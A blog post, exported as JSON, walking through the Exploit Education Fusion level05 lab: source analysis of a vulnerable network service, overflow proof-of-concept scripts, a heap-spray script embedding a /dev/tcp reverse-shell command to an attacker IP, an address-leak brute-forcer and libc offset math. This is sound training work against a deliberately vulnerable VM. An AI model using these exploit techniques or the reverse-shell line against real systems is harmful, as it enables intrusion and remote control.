{"id":1476,"date":"2021-05-16T21:27:25","date_gmt":"2021-05-17T01:27:25","guid":{"rendered":"https:\/\/blog.lamarranet.com\/?p=1476"},"modified":"2023-07-14T07:03:52","modified_gmt":"2023-07-14T11:03:52","slug":"exploit-education-fusion-level-05-solution","status":"publish","type":"post","link":"https:\/\/blog.lamarranet.com\/index.php\/exploit-education-fusion-level-05-solution\/","title":{"rendered":"Exploit Education | Fusion | Level 05 Solution"},"content":{"rendered":"

Even more information leaks and stack overwrites. This time with random libraries \/ evented programming styles :><\/p>\n

The description and source code can be found here:
\nhttp:\/\/exploit.education\/fusion\/level05\/<\/a><\/p>\n

Source Code Analysis<\/h1>\n

At a high level, this program allows you to connect to the service and register users into a “database” (it’s just a global array variable). It also lets you send the “database” to a remote host, check names to see if they’ve been registered, and see which registered user is “up” on a port that you specify.<\/p>\n

childtask()<\/h4>\n

This function simply handles each of the program’s available commands:<\/p>\n

\r\nif (strncmp(buffer, "addreg ", 7) == 0) {\r\n    taskcreate(addreg, strdup(buffer + 7), STACK);\r\n    continue;\r\n}\r\n\r\nif (strncmp(buffer, "senddb ", 7) == 0) {\r\n    taskcreate(senddb, strdup(buffer + 7), STACK);\r\n    continue;\r\n}\r\n\r\nif (strncmp(buffer, "checkname ", 10) == 0) {\r\n    struct isuparg *isa = calloc(sizeof(struct isuparg), 1);\r\n    isa->fd = cfd;\r\n    isa->string = strdup(buffer + 10);\r\n    taskcreate(checkname, isa, STACK);\r\n    continue;\r\n}\r\n\r\nif (strncmp(buffer, "quit", 4) == 0) {\r\n    break;\r\n}\r\n\r\nif (strncmp(buffer, "isup ", 5) == 0) {\r\n    struct isuparg *isa = calloc(sizeof(struct isuparg), 1);\r\n    isa->fd = cfd;\r\n    isa->string = strdup(buffer + 5);\r\n    taskcreate(isup, isa, STACK);\r\n}\r\n<\/pre>\n
addreg()<\/h4>\n
This function lets you register users into a “database” by supplying the command, name, flags (as an integer), and IPv4 address.<\/p>\n
\r\nstatic void addreg(void *arg) {\r\n    char *name, *sflags, *ipv4, *p;\r\n    int h, flags;\r\n    char *line = (char *)(arg);\r\n\r\n    name = line;\r\n    p = strchr(line, ' ');\r\n    if (! p) goto bail;\r\n    *p++ = 0;\r\n    sflags = p;\r\n    p = strchr(p, ' ');\r\n    if (! p) goto bail;\r\n    *p++ = 0;\r\n    ipv4 = p;\r\n\r\n    flags = atoi(sflags);\r\n    if (flags & ~0xe0) goto bail;\r\n\r\n    h = hash(name, strlen(name), REGDB-1);\r\n    registrations[h].flags = flags;\r\n    registrations[h].ipv4 = inet_addr(ipv4);\r\n\r\n    printf("registration added successfully\\n");\r\n\r\nbail:\r\n    free(line);\r\n}\r\n<\/pre>\n
The program performs a check on the “flag” integer you supply. It quits and nothing happens if you don’t supply one of the following values: 0, 32, 64, 96, 128, 160, 192, 224. There doesn’t seem to be any reason for this and the flag integer doesn’t seem to be used in any meaningful way.<\/p>\n
The name supplied is “hashed” with their own custom 7-bit hashing algorithm. That hash is then used as the index for where to save the flags and IPv4 address in the registrations[]<\/code> array.<\/p>\n
An example of using the addreg<\/code> command:<\/p>\n
\r\nandrew ~ $ nc fusion 20005\r\naddreg Andrew 32 10.0.1.4\r\n<\/pre>\n
senddb()<\/h4>\n
This function has an overflow vulnerability that I will later realize isn’t necessary for exploiting this program. So feel free to skip this section entirely. However, I’ll leave it in for shits & giggles…<\/p>\n
\r\nstatic void senddb(void *arg) {\r\n    unsigned char buffer[512], *p;\r\n    char *host, *l;\r\n    char *line = (char *)(arg);\r\n    int port;\r\n    int fd;\r\n    int i;\r\n    int sz;\r\n\r\n    p = buffer;\r\n    sz = sizeof(buffer);\r\n    host = line;\r\n    l = strchr(line, ' ');\r\n    if (! l) goto bail;\r\n    *l++ = 0;\r\n    port = atoi(l);\r\n    if (port == 0) goto bail;\r\n\r\n    printf("sending db\\n");\r\n\r\n    if ((fd = netdial(UDP, host, port)) < 0) goto bail;\r\n\r\n    for (sz = 0, p = buffer, i = 0; i < REGDB; i++) {\r\n        if (registrations[i].flags | registrations[i].ipv4) {\r\n            memcpy(p, &registrations[i], sizeof(struct registrations));\r\n            p += sizeof(struct registrations);\r\n            sz += sizeof(struct registrations);\r\n        }\r\n    }\r\nbail:\r\n    fdwrite(fd, buffer, sz);\r\n    close(fd);\r\n    free(line);\r\n}\r\n<\/pre>\n
The for loop will copy the data from each element of the registrations[]<\/code> array into the buffer[512]<\/code> array. The registrations[]<\/code> array is capable of holding up to 128 elements of the registrations<\/code> struct, which was defined globally earlier:<\/p>\n
\r\nstruct registrations {\r\n    short int flags;\r\n    in_addr_t ipv4;\r\n} __attribute__((packed));\r\n\r\n#define REGDB (128)\r\nstruct registrations registrations[REGDB];\r\n<\/pre>\n
Since the struct was given the packed<\/code> attribute, it will only use as much space as needed, which happens to be 6 bytes. Two bytes for the short int and 4 for the in_addr_t. A little math will tell us that the filling the registrations[]<\/code> array will take 768 bytes (6 * 128). That’s 256 bytes more than the buffer[512]<\/code> array.<\/p>\n
I wrote a short script as a proof of concept:<\/p>\n
\r\n#!\/usr\/bin\/env python3\r\n\r\nfrom pwn import *\r\nimport time\r\nimport string\r\nimport random\r\n\r\ndef random_string(size):\r\n    return ''.join(random.choice(string.ascii_letters) for x in range(size))\r\n\r\nio = remote("fusion", 20005)\r\nlocal_ip = "10.0.1.4"\r\nlocal_port = 4444\r\n\r\nlog.info("Sending 'addreg' commands")\r\nfor i in range(170):\r\n    io.sendline(f"addreg {random_string(32)} 32 17.17.17.17")\r\n    time.sleep(0.1)\r\n\r\nlog.info("Sending 'senddb' command")\r\nsenddb = f"senddb {local_ip} {local_port}\\n"\r\nio.send(senddb)\r\nio.close()\r\n<\/pre>\n
Running this script from the attacking VM takes about 20 seconds because of the 0.1 second sleep between each command. Without this, I noticed that a bunch of the commands would be bunched into a single packet and the buffer wasn’t being overflown.<\/p>\n
\r\nandrew ~\/level05 $ .\/bof.py \r\n[+] Opening connection to fusion on port 20005: Done\r\n[*] Sending 'addreg' commands\r\n[*] Sending 'senddb' command\r\n[*] Closed connection to fusion port 20005\r\n<\/pre>\n
On the Fusion VM, we can see the segfault in the kernel messages:<\/p>\n
\r\nfusion@fusion:~$ dmesg\r\n...\r\n[ 2446.051965] level05[1878]: segfault at 20110d ip b764d90e sp b8ff695c error 4 in libc-2.13.so[b75db000+176000]\r\n<\/pre>\n
Hash<\/h5>\n
I need to have a list of strings I can use for the “name” field and their hashed value. I’ll need to be able to place data in certain places of the overflown buffer. In order to do that, I’ll need to know which index in the registrations[]<\/code> array I have to work with. I re-wrote the hashing algorithm in a Python script and created a loop to hash a bunch of 2-character strings and print the results.<\/p>\n
\r\n#!\/usr\/bin\/env python3\r\n\r\nimport string\r\nimport sys\r\n\r\n\r\ndef hash(string):\r\n    mask = 127\r\n    h = 0xfee13117\r\n    max_int = 0xffffffff\r\n\r\n    for i in range(len(string)):\r\n        h ^= ord(string[i])\r\n        h += (h << 11)\r\n        h &= max_int\r\n        h ^= (h >> 7)\r\n        h -= ord(string[i])\r\n\r\n    h += (h << 3)\r\n    h &= max_int\r\n    h ^= (h >> 10)\r\n    h += (h << 15)\r\n    h &= max_int\r\n    h -= (h >> 17)\r\n\r\n    return (h & mask)\r\n\r\n\r\nif __name__ == "__main__":\r\n    all_chars = string.ascii_letters + string.digits #+ string.punctuation\r\n    for i in range(len(all_chars)):\r\n        for j in range(len(all_chars)):\r\n            string = all_chars[i] + all_chars[j]\r\n            h = hash(string, len(string))\r\n            print(f"{h}\\t{string}")\r\n<\/pre>\n
checkname()<\/h4>\n
There exists another buffer overflow in the get_and_hash()<\/code> function, which is called by checkname()<\/code>.<\/p>\n
\r\nint get_and_hash(int maxsz, char *string, char separator) {\r\n    char name[32];\r\n    int i;\r\n\r\n    if (maxsz > 32) return 0;\r\n    for (i = 0; i < maxsz, string[i]; i++) {\r\n        if (string[i] == separator) break;\r\n        name[i] = string[i];\r\n    }\r\n\r\n    return hash(name, strlen(name), 0x7f);\r\n}\r\n\r\nstruct isuparg {\r\n    int fd;\r\n    char *string;\r\n};\r\n\r\nstatic void checkname(void *arg) {\r\n    struct isuparg *isa = (struct isuparg *)(arg);\r\n    int h;\r\n\r\n    h = get_and_hash(32, isa->string, '@');\r\n    fdprintf(isa->fd, "%s is %sindexed already\\n", isa->string, registrations[h].ipv4 ? "" : "not ");\r\n}\r\n<\/pre>\n
The checkname()<\/code> function takes the string the user supplied after the “checkname ” command and sends it to the get_and_hash()<\/code> function. It looks like the intention is to loop through each character of that string, save it to the name[32]<\/code> variable, and stop when either the supplied string ends or it reaches the maximum size of 32.<\/p>\n
Except, that’s not how this works. Admittedly, it took me a long time to spot this myself as I’m not a C developer. The comma operator in the for loop says to keep looping whle i<\/code> is less than maxsz<\/code> OR while string[i]<\/code> exists.<\/del> The comma operator in the for loop returns only the last value of the expression, so it will ignore maxsz<\/code> and keep looping while string[i]<\/code> exists.<\/p>\n
We can test this out by sending the “checkname” command followed by a string that we know will overflow the buffer and overwrite the saved EIP pointer.<\/p>\n
\r\nandrew ~\/level05 $ python3 -c 'print("checkname " + "A"*50)' | nc fusion 20005\r\n** welcome to level05 **\r\n<\/pre>\n
The dmesg<\/code> command on the Fusion VM will show that we have full control over the EIP register.<\/p>\n
\r\nfusion@fusion ~ $ dmesg \r\n[10664.771069] level05[3230]: segfault at 41414141 ip 41414141 sp b929ebb0 error 14\r\n<\/pre>\n
This, alone, will not do much for us as everything is randomized. Even the addresses of the code is random as it’s a Position Independent Executable. But we’ll see later how this can be used.<\/p>\n
Note that the get_and_hash()<\/code> function does NOT null-terminate the name[]<\/code> string. Because data is already on the stack, the name passed to the hash()<\/code> function is rarely the same as what the user submitted. So usually, you’ll get the message that “ is not indexed already” even if it IS indexed already.<\/p>\n
isup()<\/h4>\n
The “isup” command takes 2 arguments (for some reason), almost anything is possible for the first and a valid port number for the second. It simply goes through all the registered “names” in its database and attempts to connect to them via UDP on the port that was specified. If the host is listening on the specified port, then the server sends it part of its registration info.<\/p>\n
\r\nstatic void isup(void *arg) {\r\n    unsigned char buffer[512], *p;\r\n    char *host, *l;\r\n    struct isuparg *isa = (struct isuparg *)(arg);\r\n    int port;\r\n    int fd;\r\n    int i;\r\n    int sz;\r\n\r\n    \/\/ skip over first arg, get port\r\n    l = strchr(isa->string, ' ');\r\n    if (! l) return;\r\n    *l++ = 0;\r\n\r\n    port = atoi(l);\r\n    host = malloc(64);\r\n\r\n    for (i = 0; i < 128; i++) {\r\n        p = (unsigned char *)(& registrations[i]);\r\n        if (! registrations[i].ipv4) continue;\r\n\r\n        sprintf(host, "%d.%d.%d.%d",\r\n            (registrations[i].ipv4 >> 0) & 0xff,\r\n            (registrations[i].ipv4 >> 8) & 0xff,\r\n            (registrations[i].ipv4 >> 16) & 0xff,\r\n            (registrations[i].ipv4 >> 24) & 0xff);\r\n\r\n        if ((fd = netdial(UDP, host, port)) < 0) {\r\n            continue;\r\n        }\r\n\r\n        buffer[0] = 0xc0;\r\n        memcpy(buffer + 1, p, sizeof(struct registrations));\r\n        buffer[5] = buffer[6] = buffer[7] = 0;\r\n\r\n        fdwrite(fd, buffer, 8);\r\n        close(fd);\r\n    }\r\n\r\n    free(host);\r\n}\r\n<\/pre>\n
Something important to note is that before the call to isup()<\/code> (take a look back at the childtask()<\/code> function), the buffer variable that contains the user-supplied data is put through strdup()<\/code>, which will allocate space for it on the heap. However, the pointer that’s returned from that never get’s freed.<\/p>\n
Exploitation<\/h1>\n
Heap Spraying<\/h2>\n
Because memory in the heap is not properly freed after being allocated with the “isup” command, we can fill the heap with our own data. We will then overwrite the isa->fd<\/code> pointer in the checkname()<\/code> function and try to get it to point to somewhere in the heap (more on that later). We’ll need to include a string that can get us a reverse shell to pass as an argument to system()<\/code> as well as the value for the file descriptor, which happens to always be 0x4. That allows the program to send data back to us. Since this is filling a 32 bit integer space, there will be some null bytes involved, which means it’ll need to be at the end of our data.<\/p>\n
We’ll need to get an idea for where the heap base address may be and where it could possibly end. The more data we fill the heap with, the better of a chance we’ll have of finding a valid address later. However, we don’t need to fill it up completely, so we’ll try to be smart about it.<\/p>\n
Some of the processes had heap space starting with 0x0 instead of 0xb. Our “level05” process (and all the other levels) always start with 0xb:<\/p>\n
\r\nroot ~ # cat \/proc\/$(pidof level05)\/maps \r\nb7648000-b768a000 rw-p 00000000 00:00 0 \r\nb768a000-b7800000 r-xp 00000000 07:00 92669      \/lib\/i386-linux-gnu\/libc-2.13.so\r\nb7800000-b7802000 r--p 00176000 07:00 92669      \/lib\/i386-linux-gnu\/libc-2.13.so\r\nb7802000-b7803000 rw-p 00178000 07:00 92669      \/lib\/i386-linux-gnu\/libc-2.13.so\r\nb7803000-b7806000 rw-p 00000000 00:00 0 \r\nb7810000-b7812000 rw-p 00000000 00:00 0 \r\nb7812000-b7813000 r-xp 00000000 00:00 0          [vdso]\r\nb7813000-b7831000 r-xp 00000000 07:00 92553      \/lib\/i386-linux-gnu\/ld-2.13.so\r\nb7831000-b7832000 r--p 0001d000 07:00 92553      \/lib\/i386-linux-gnu\/ld-2.13.so\r\nb7832000-b7833000 rw-p 0001e000 07:00 92553      \/lib\/i386-linux-gnu\/ld-2.13.so\r\nb7833000-b7839000 r-xp 00000000 07:00 75280      \/opt\/fusion\/bin\/level05\r\nb7839000-b783a000 rw-p 00006000 07:00 75280      \/opt\/fusion\/bin\/level05\r\nb783a000-b783d000 rw-p 00000000 00:00 0 \r\nb9270000-b9291000 rw-p 00000000 00:00 0          [heap]\r\nbfb7d000-bfb9e000 rw-p 00000000 00:00 0          [stack]\r\n<\/pre>\n
Let’s look at the heap space addresses for the various processes on the Fusion VM:<\/p>\n
\r\nroot ~ # cat \/proc\/*\/maps | grep heap | grep ^b | sort\r\nb7815000-b7836000 rw-p 00000000 00:00 0          [heap]\r\nb7b7c000-b7b9d000 rw-p 00000000 00:00 0          [heap]\r\nb7d46000-b7d67000 rw-p 00000000 00:00 0          [heap]\r\nb7d46000-b7d67000 rw-p 00000000 00:00 0          [heap]\r\nb7d46000-b7d67000 rw-p 00000000 00:00 0          [heap]\r\nb7d67000-b7d88000 rw-p 00000000 00:00 0          [heap]\r\nb7d67000-b7d88000 rw-p 00000000 00:00 0          [heap]\r\nb7d67000-b7da7000 rw-p 00000000 00:00 0          [heap]\r\nb7e4c000-b7e6d000 rw-p 00000000 00:00 0          [heap]\r\nb7e90000-b7ed7000 rw-p 00000000 00:00 0          [heap]\r\nb82b7000-b82d8000 rw-p 00000000 00:00 0          [heap]\r\nb8336000-b8357000 rw-p 00000000 00:00 0          [heap]\r\nb837f000-b83a0000 rw-p 00000000 00:00 0          [heap]\r\nb8ae1000-b8b44000 rw-p 00000000 00:00 0          [heap]\r\nb8e0b000-b8e46000 rw-p 00000000 00:00 0          [heap]\r\nb8e0b000-b8e46000 rw-p 00000000 00:00 0          [heap]\r\nb8e32000-b8e53000 rw-p 00000000 00:00 0          [heap]\r\nb9270000-b9291000 rw-p 00000000 00:00 0          [heap]\r\nb9647000-b9668000 rw-p 00000000 00:00 0          [heap]\r\n<\/pre>\n
We can see that it generally ranges between 0xb7815000 and 0xb9668000 (lowest address to highest address), the difference of which is 0x1e53000. That’s 31,797,248 in decimal. The childtask()<\/code> function stores each command into a buffer with a maximum size of 512 bytes. In addition, you’ll see later that another 16 bytes of heap space is taken up to store the file descriptor each time. This means we’d need to send the “isup” command (the one we’re using for heap spraying) 60,222 times (31,797,248 \u00f7 (512 + 16)). Let’s take a look at what the heap looks like when we send data. FIrst, I’ll attach to the “level05” process from the Fusion VM using gdbserver<\/code>:<\/p>\n
\r\nroot ~ # gdbserver --attach :1234 $(pidof level05)\r\nAttached; pid = 4819\r\nListening on port 1234\r\n<\/pre>\n
Then I’ll connect to it from GDB on my attacking VM (note that I copied the level05 binary to my attacking machine so that I could have GDB read the symbols):<\/p>\n
\r\nandrew ~\/level05 $ gdb\r\nGEF for linux ready, type `gef' to start, `gef config' to configure\r\n92 commands loaded for GDB 9.2 using Python engine 3.8\r\n\r\ngef\u27a4  file level05\r\nReading symbols from level05...\r\n\r\ngef\u27a4  target remote 10.0.1.5:1234\r\nRemote debugging using 10.0.1.5:1234\r\n...\r\n\r\ngef\u27a4  c\r\nContinuing.\r\n<\/pre>\n
Now I’ll send some data:<\/p>\n
\r\nandrew ~\/level05 $ echo "isup $(pwn cyclic 512)" | nc fusion 20005\r\n** welcome to level05 **\r\n<\/pre>\n
And check the heap:<\/p>\n
\r\n^C\r\nProgram received signal SIGINT, Interrupt.\r\n...\r\ngef\u27a4  heap chunks\r\nChunk(addr=0xb91fd008, size=0x108, flags=PREV_INUSE)\r\n    [0xb91fd008     08 b0 5c b7 10 d1 1f b9 b0 54 20 b9 60 da 20 b9    ..\\......T .`. .]\r\nChunk(addr=0xb91fd110, size=0x83a0, flags=PREV_INUSE)\r\n    [0xb91fd110     66 64 74 61 73 6b 00 00 00 00 00 00 00 00 00 00    fdtask..........]\r\nChunk(addr=0xb92054b0, size=0x83a0, flags=PREV_INUSE)\r\n    [0xb92054b0     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................]\r\nChunk(addr=0xb920d850, size=0x10, flags=PREV_INUSE)\r\n    [0xb920d850     04 00 00 00 60 d8 20 b9 00 00 00 00 01 02 00 00    ....`. .........]\r\nChunk(addr=0xb920d860, size=0x200, flags=PREV_INUSE)\r\n    [0xb920d860     61 61 61 61 62 61 61 61 63 61 61 61 64 61 61 61    aaaabaaacaaadaaa]\r\nChunk(addr=0xb920da60, size=0x105a8, flags=PREV_INUSE)  \u2190  top chunk\r\n\r\ngef\u27a4  x\/128wx 0xb920d860\r\n0xb920d860:\t0x61616161\t0x61616162\t0x61616163\t0x61616164\r\n0xb920d870:\t0x61616165\t0x61616166\t0x61616167\t0x61616168\r\n0xb920d880:\t0x61616169\t0x6161616a\t0x6161616b\t0x6161616c\r\n0xb920d890:\t0x6161616d\t0x6161616e\t0x6161616f\t0x61616170\r\n0xb920d8a0:\t0x61616171\t0x61616172\t0x61616173\t0x61616174\r\n0xb920d8b0:\t0x61616175\t0x61616176\t0x61616177\t0x61616178\r\n0xb920d8c0:\t0x61616179\t0x6261617a\t0x62616162\t0x62616163\r\n0xb920d8d0:\t0x62616164\t0x62616165\t0x62616166\t0x62616167\r\n0xb920d8e0:\t0x62616168\t0x62616169\t0x6261616a\t0x6261616b\r\n0xb920d8f0:\t0x6261616c\t0x6261616d\t0x6261616e\t0x6261616f\r\n0xb920d900:\t0x62616170\t0x62616171\t0x62616172\t0x62616173\r\n0xb920d910:\t0x62616174\t0x62616175\t0x62616176\t0x62616177\r\n0xb920d920:\t0x62616178\t0x62616179\t0x6361617a\t0x63616162\r\n0xb920d930:\t0x63616163\t0x63616164\t0x63616165\t0x63616166\r\n0xb920d940:\t0x63616167\t0x63616168\t0x63616169\t0x6361616a\r\n0xb920d950:\t0x6361616b\t0x6361616c\t0x6361616d\t0x6361616e\r\n0xb920d960:\t0x6361616f\t0x63616170\t0x63616171\t0x63616172\r\n0xb920d970:\t0x63616173\t0x63616174\t0x63616175\t0x63616176\r\n0xb920d980:\t0x63616177\t0x63616178\t0x63616179\t0x6461617a\r\n0xb920d990:\t0x64616162\t0x64616163\t0x64616164\t0x64616165\r\n0xb920d9a0:\t0x64616166\t0x64616167\t0x64616168\t0x64616169\r\n0xb920d9b0:\t0x6461616a\t0x6461616b\t0x6461616c\t0x6461616d\r\n0xb920d9c0:\t0x6461616e\t0x6461616f\t0x64616170\t0x64616171\r\n0xb920d9d0:\t0x64616172\t0x64616173\t0x64616174\t0x64616175\r\n0xb920d9e0:\t0x64616176\t0x64616177\t0x64616178\t0x64616179\r\n0xb920d9f0:\t0x6561617a\t0x65616162\t0x65616163\t0x65616164\r\n0xb920da00:\t0x65616165\t0x65616166\t0x65616167\t0x65616168\r\n0xb920da10:\t0x65616169\t0x6561616a\t0x6561616b\t0x6561616c\r\n0xb920da20:\t0x6561616d\t0x6561616e\t0x6561616f\t0x65616170\r\n0xb920da30:\t0x65616171\t0x65616172\t0x65616173\t0x65616174\r\n0xb920da40:\t0x65616175\t0x65616176\t0x65616177\t0x65616178\r\n0xb920da50:\t0x65616179\t0x6661617a\t0x00616162\t0x000105a9\r\n<\/pre>\n
The last full word value here (without a space) is 0x6661617a. We’ll find the offset of that and add our 0x4 value afterward in the heap spray script:<\/p>\n
\r\nandrew ~\/level05 $ pwn cyclic -l 0x6661617a\r\n500\r\n<\/pre>\n
That means we can put 504 characters of padding (the 500 number does not include the 4 characters of the last full word value) in the buffer before our file descriptor value. Here’s a script I came up with for spraying the heap:<\/p>\n
\r\n#!\/usr\/bin\/env python3\r\n\r\nfrom pwn import *\r\nfrom time import sleep\r\n\r\n\r\nbuff_sz = 504\r\ncommand  = b"isup "\r\ncontent  = b"ABC "\r\ncontent += b"\/bin\/sh > \/dev\/tcp\/10.0.1.4\/1337 0>&1 2>&1; " # 44 bytes\r\ncontent += b"A" * (buff_sz - len(content))\r\ncontent += pack(4)\r\n\r\nio = remote("fusion", 20005)\r\nlog.info(io.recvline())\r\n\r\nmax_spray = 60222\r\nwith log.progress('Spraying') as p:\r\n    for i in range(max_spray):\r\n        io.send(command + content)\r\n        p.status(f"{(i\/max_spray):.2%}")\r\n        sleep(0.005)\r\n<\/pre>\n
A couple of notes:<\/p>\n
    \n
  • The “content” variable starts with “ABC <\/code>” because the first space in our content will get turned into a null byte. We can’t have that happen in the middle of our reverse shell string. Also I needed a unique value, like “ABC”, later on when I’m checking the returned data.<\/li>\n
  • I need to add that small sleep value because without it, some of the requests get lumped together into a single packet. If that happens, only the first request is valid and the rest are ignored.<\/li>\n<\/ul>\n
    Running the script takes about 8 minutes:<\/p>\n
    \r\nandrew ~\/level05 $ time .\/3_spray.py \r\n[+] Opening connection to fusion on port 20005: Done\r\n[*] ** welcome to level05 **\r\n[+] Spraying: Done\r\n \r\nreal    8m17.777s\r\nuser    0m21.451s\r\nsys     1m28.634s\r\n<\/pre>\n
    Leaking the File Descriptor<\/h2>\n
    Now that we’ve got the heap filled with data, we can look at the addresses there and try to find a pattern to make our address guessing a bit smarter:<\/p>\n
    \r\ngef\u27a4  heap chunks \r\nChunk(addr=0xb8759008, size=0x108, flags=PREV_INUSE)\r\n    [0xb8759008     08 b0 60 b7 10 91 75 b8 b0 14 76 b8 70 9c 76 b8    ..`...u...v.p.v.]\r\nChunk(addr=0xb8759110, size=0x83a0, flags=PREV_INUSE)\r\n    [0xb8759110     66 64 74 61 73 6b 00 00 00 00 00 00 00 00 00 00    fdtask..........]\r\nChunk(addr=0xb87614b0, size=0x83a0, flags=PREV_INUSE)\r\n    [0xb87614b0     30 64 7c b7 30 64 7c b7 00 00 00 00 00 00 00 00    0d|.0d|.........]\r\nChunk(addr=0xb8769850, size=0x10, flags=)\r\n    [0xb8769850     04 00 00 00 60 98 76 b8 00 00 00 00 01 02 00 00    ....`.v.........]\r\nChunk(addr=0xb8769860, size=0x200, flags=PREV_INUSE)\r\n    [0xb8769860     41 41 41 00 2f 62 69 6e 2f 73 68 20 3e 20 2f 64    AAA.\/bin\/sh > \/d]\r\nChunk(addr=0xb8769a60, size=0x10, flags=PREV_INUSE)\r\n    [0xb8769a60     04 00 00 00 70 9a 76 b8 00 00 00 00 01 02 00 00    ....p.v.........]\r\nChunk(addr=0xb8769a70, size=0x200, flags=PREV_INUSE)\r\n    [0xb8769a70     41 41 41 00 2f 62 69 6e 2f 73 68 20 3e 20 2f 64    AAA.\/bin\/sh > \/d]\r\n...\r\n<\/pre>\n
    We can see that the address of each chunk is 16-byte aligned and ends with 0.
    \nLet’s look at the contents of a single chunk:<\/p>\n
    \r\ngef\u27a4  x\/128wx 0xb8769860\r\n0xb8769860:\t0x00414141\t0x6e69622f\t0x2068732f\t0x642f203e\r\n0xb8769870:\t0x742f7665\t0x312f7063\t0x2e302e30\t0x2f342e31\r\n0xb8769880:\t0x37333331\t0x263e3020\t0x3e322031\t0x203b3126\r\n0xb8769890:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\r\n0xb87698a0:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\r\n0xb87698b0:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\r\n0xb87698c0:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\r\n0xb87698d0:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\r\n0xb87698e0:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\r\n0xb87698f0:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\r\n0xb8769900:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\r\n0xb8769910:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\r\n0xb8769920:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\r\n0xb8769930:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\r\n0xb8769940:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\r\n0xb8769950:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\r\n0xb8769960:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\r\n0xb8769970:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\r\n0xb8769980:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\r\n0xb8769990:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\r\n0xb87699a0:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\r\n0xb87699b0:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\r\n0xb87699c0:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\r\n0xb87699d0:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\r\n0xb87699e0:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\r\n0xb87699f0:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\r\n0xb8769a00:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\r\n0xb8769a10:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\r\n0xb8769a20:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\r\n0xb8769a30:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\r\n0xb8769a40:\t0x41414141\t0x41414141\t0x41414141\t0x41414141\r\n0xb8769a50:\t0x41414141\t0x41414141\t0x00000004\t0x00000011\r\n<\/pre>\n
    The file descriptor that we included at the end (0x00000004<\/code>) will always have an address ending with 8.<\/p>\n
    Let’s look at the tail end of the disassembly (from Ghidra) for the get_and_hash()<\/code> function:<\/p>\n
    \r\n000127ab     ADD      ESP, 0x2c\r\n000127ae     POP      ESI\r\n000127af     POP      EDI\r\n000127b0     POP      EBP\r\n000127b1     RET\r\n<\/pre>\n
    The stack includes 44 bytes (0x2c) of space, followed by saved values for the ESI, EDI, EBP, and EIP registers. Once execution is returned to the checkname()<\/code> function, a few things happen but we’ll see what happens to the value in the ESI register before fdprintf()<\/code> is called:<\/p>\n
    \r\n0001282b     MOV      EAX, dword ptr [ESI]\r\n0001282d     MOV      dword ptr [ESP], EAX\r\n00012830     CALL     fdprintf\r\n<\/pre>\n
    It gets saved to the top of the stack as the first argument to fdprintf()<\/code>. This tells us that it’s the pointer to the file descriptor.<\/p>\n
    Now, I’ll write a script to find a valid file descriptor address in our heap space.<\/p>\n
    \r\n#!\/usr\/bin\/env python3\r\n\r\nfrom pwn import *\r\nimport sys\r\n\r\nstart_addr = 0xb9700108\r\ncontent  = b"checkname "\r\ncontent += b"A" * 32\r\n\r\nio = remote("fusion", 20005)\r\nlog.info(io.recvline())\r\nlog.info("Sending 'checkname' commands")\r\n\r\nfor addr in range(start_addr, start_addr+528, 16):\r\n    io.sendline(content + p32(addr))\r\n    data = io.recvline(timeout=0.1)\r\n\r\n    if b"indexed already" in data:\r\n        log.success(f"Found address = {addr:#010x}")\r\n        log.info(f"Reverse shell string should be at {addr+28:#010x}")\r\n        sys.exit()\r\n\r\nlog.warning("File descriptor address not found!")\r\n<\/pre>\n
    Choosing the address to start guessing with (line 8) can be tricky. If it’s outside the heap and it’s an invalid address, the program will crash and we’ll need to start over again by spraying the heap. I chose that starting address (0xb9700108<\/code>) because I looked at all the heap starting addresses for the other processes on the system and didn’t see any that start above that, so it should be safe. I also know that with the amount of data we’re spraying the heap with, it’s not too high to go above the allocated heap space. AND I know that the file descriptor address will always end with 8.<\/p>\n
    You can see that the for loop will only run through 33 times (528 \u00f7 16). That should be the maximum number of guesses needed to find the file descriptor.<\/p>\n
    \r\nandrew ~\/level05 $ .\/leak_fd.py \r\n[+] Opening connection to fusion on port 20005: Done\r\n[*] ** welcome to level05 **\r\n[*] Sending 'checkname' commands\r\n[+] File descriptor address = 0xb9700208\r\n[*] Reverse shell string should be at 0xb9700224\r\n<\/pre>\n
    Leaking a Libc Address<\/h2>\n
    The goal here is to call the system()<\/code> function from libc and pass it a pointer to our reverse shell string. In order to get this address, we would normally leak it’s address from the .got.plt section. This is how the program knows where the various libc (and other shared libraries) functions are stored at. However, the system()<\/code> function is never called in this binary, so it is not mapped in the .got.plt section. We’ll need to leak another function’s address and calculate the offset from that to system()<\/code>. In this case, I’ll be leaking the write()<\/code> function’s address.<\/p>\n
    <\/p>\n
    First, I’m going to find the system()<\/code> and write()<\/code> offsets:<\/p>\n
    \r\n# readelf -s \/lib\/i386-linux-gnu\/libc-2.13.so | grep -E ' system@| write@'\r\n  1409: 0003cb20   139 FUNC    WEAK   DEFAULT   12 system@@GLIBC_2.0\r\n  2247: 000c12c0   128 FUNC    WEAK   DEFAULT   12 write@@GLIBC_2.0\r\n<\/pre>\n
    A little hex math tells us that 0xc12c0 – 0x3cb20 = 0x847a0. So, whichever address we find for write()<\/code>, we just need to subtract 0x847a0 from it in order to get the system()<\/code> function address.<\/p>\n
